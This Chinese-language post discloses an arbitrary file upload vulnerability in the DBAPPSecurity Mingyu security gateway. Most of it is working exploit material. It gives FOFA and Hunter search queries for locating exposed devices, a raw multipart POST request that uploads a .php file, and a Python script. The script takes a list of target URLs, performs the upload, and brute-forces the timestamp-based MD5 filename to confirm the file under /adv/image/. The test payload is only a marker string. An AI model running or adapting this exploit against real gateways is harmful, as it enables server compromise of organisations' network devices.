安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞

一、漏洞简介

安恒信息明御安全网关（以下简称“NGFW”）秉持安全可视、简单有效的理念，以资产为视角，构建“事前+事中+事后”全流程防御的下一代安全防护体系，并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞。攻击者可通过该漏洞获取服务器权限。

二、影响版本

• 安恒明御安全网关

三、资产测绘

• hunterapp.name="安恒明御安全网关"
• fofatitle="明御安全网关"
• 特征

四、漏洞复现

POST /webui/?g=net_dynamic_pop_adv_submit HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 196
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="filename"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

文件上传位置

文件会以时间戳md5的方式存储在/adv/image/md5(时间戳).php

python利用脚本

import requests,re
import urllib3
import string,random
from urllib.parse import urljoin,quote
import argparse
from bs4 import BeautifulSoup
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import time
import hashlib

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls
def check(url):
        url = url.rstrip("/")
        target = urljoin(url,"/webui/?g=net_dynamic_pop_adv_submit")
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
            "Connection": "close",
            "Content-Length": "203",
            "Accept-Encoding": "gzip",
            "Content-Type": "multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd"
        }
        data="--qqobiandqgawlxodfiisporjwravxtvd\nContent-Disposition: form-data; name=\"filename\"; filename=\"9B9Ccd.php\"\nContent-Type: text/plain\n\n2ZqGNnsjzzU2GBBPyd8AIA7QlDq\n--qqobiandqgawlxodfiisporjwravxtvd--"
            # 获取当前时间的UNIX时间戳（毫秒级）
        try:
            proxy_address = 'http://127.0.0.1:8080'
            proxies = {
                    'http': proxy_address,
                    'https': proxy_address
            }
            response = requests.post(target, headers=headers, data=data, verify=False,timeout=3)#,proxies=proxies)
            if response.status_code != 200  or 'g=net_dynamic_pop_adv' not in response.text:
                print(f"\033[31m未找到:{url}: 不存在安恒net_dynamic_pop_adv_submit文件上传漏洞\033[0m")
                return True 
            else:
                print(f"\033[31m{url}地址存在安恒net_dynamic_pop_adv_submit文件上传漏洞，开始爆破(由于该网关很多设备时间不对，可能找不到上传文件，可循环爆破一整天的时间，即加/减86400秒，大概率可找到)\033[0m")
            current_unix_timestamp_ms = int(time.time())
            for i in range(1, 20):
                current_unix_timestamp_ms1 = (current_unix_timestamp_ms-5)+i
                # 打印当前的UNIX时间戳（毫秒级）
                print("第一次破解（北京时间）：当前地址",url,"UNIX时间戳（毫秒级）:", current_unix_timestamp_ms1)
                # 将时间戳转换为字符串，因为hashlib不能直接对整数进行哈希
                timestamp_str = str(current_unix_timestamp_ms1)
                # 创建一个md5哈希对象
                md5_hash = hashlib.md5()
                # 更新哈希对象的内容，传递字符串的bytes表示
                md5_hash.update(timestamp_str.encode('utf-8'))
                # 获取十六进制表示的哈希值字符串
                md5_result = md5_hash.hexdigest()
                # 打印MD5加密后的结果
                print("第一次破解（北京时间）：当前地址",url,"UNIX时间戳（毫秒级）的MD5加密结果:", md5_result)
                target1 = urljoin(url,"/adv/image/%s.php" % md5_result)
                headers1 = {
                    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
                }
                response1 = requests.get(target1, headers=headers1, verify=False,timeout=5)#,proxies=proxies)
                if response1.status_code == 200  and '2ZqGNnsjzz' in response1.text:
                    print(f"\033[31mDiscovered:{url}/adv/image/{md5_result}.php: 存在安恒net_dynamic_pop_adv_submit文件上传漏洞\033[0m")
                    return True
            for i in range(1, 20):
                current_unix_timestamp_ms2 = (current_unix_timestamp_ms+600)+i
                # 打印当前的UNIX时间戳（毫秒级）
                print("第二次破解（快10分钟）：当前地址",url,"UNIX时间戳（毫秒级）:", current_unix_timestamp_ms2)
                # 将时间戳转换为字符串，因为hashlib不能直接对整数进行哈希
                timestamp_str = str(current_unix_timestamp_ms2)
                # 创建一个md5哈希对象
                md5_hash = hashlib.md5()
                # 更新哈希对象的内容，传递字符串的bytes表示
                md5_hash.update(timestamp_str.encode('utf-8'))
                # 获取十六进制表示的哈希值字符串
                md5_result = md5_hash.hexdigest()
                # 打印MD5加密后的结果
                print("第二次破解（快10分钟）：当前地址",url,"UNIX时间戳（毫秒级）的MD5加密结果:", md5_result)
                target2 = urljoin(url,"/adv/image/%s.php" % md5_result)
                headers2 = {
                    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
                }   
                response2 = requests.get(target2, headers=headers2, verify=False,timeout=5)#,proxies=proxies)
                if response2.status_code == 200  and '2ZqGNnsjzz' in response2.text:
                    print(f"\033[31mDiscovered爆破成功，找到上传文件:{url}/adv/image/{md5_result}.php: 存在安恒net_dynamic_pop_adv_submit文件上传漏洞\033[0m")
                    return True   
        except Exception as e:
            pass
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        # 记录当前时间
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")